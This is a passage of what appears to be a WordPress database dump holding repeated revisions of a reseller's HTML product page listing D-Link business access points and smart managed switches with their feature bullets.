srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:35:06','2019-09-25 04:35:06','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3370,1,'2019-09-25 12:37:23','2019-09-25 04:37:23','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 